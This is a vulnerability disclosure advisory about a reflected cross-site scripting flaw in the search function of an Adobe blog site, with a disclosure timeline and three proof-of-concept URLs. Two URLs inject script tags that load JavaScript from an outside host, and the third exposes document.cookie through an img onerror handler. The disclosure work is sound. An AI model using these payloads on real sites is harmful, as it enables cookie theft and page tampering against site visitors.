Adobe Experience suffers from a reflected cross site scripting vulnerability. The author contacted Adobe back in August but the issue is still not resolved so they are releasing details in hopes that Adobe will address the issue. Note that this finding houses site-specific data. Update on 01/21/2013: Adobe PSIRT has resolved the issue and the author has confirmed that this was indeed fixed.
b7ad16292219d69d31c0817f287d4e50149c4bdbd887e0e0e7282fad6aa95478
----------------------------------------------------------------------------------------------------
Title : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability
Vendor : Adobe Systems Incorporated (http://www.adobe.com)
Description : experiencedelivers.adobe.com is vulnerable to reflected Cross-site Scripting attacks
Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor PSIRT notified : 05-Aug-2012
- Vendor response : 05-Aug-2012. Ticket created. "Looking into it now".
- Status requests : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012
Adobe PSIRT has not responded to any requests after 09-Nov-2012
- Packet Storm advisory : 19-Jan-2013
Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser
Details
----------------------------------------------------------------------------------------------------
Affected functionality: search function
Test #1: Remote Javascript execution: display browser cookie
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8
Test #2, Remote Javascript execution: overwrite HTML content - PoC
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8
Test #3, Alert test with image-tag
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8
Note: the Javascript test cases are not malicious.
Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg
Twitter: https://twitter.com/JanneFI
Blog: http://janne.is
Project site: http://idash.net
----------------------------------------------------------------------------------------------------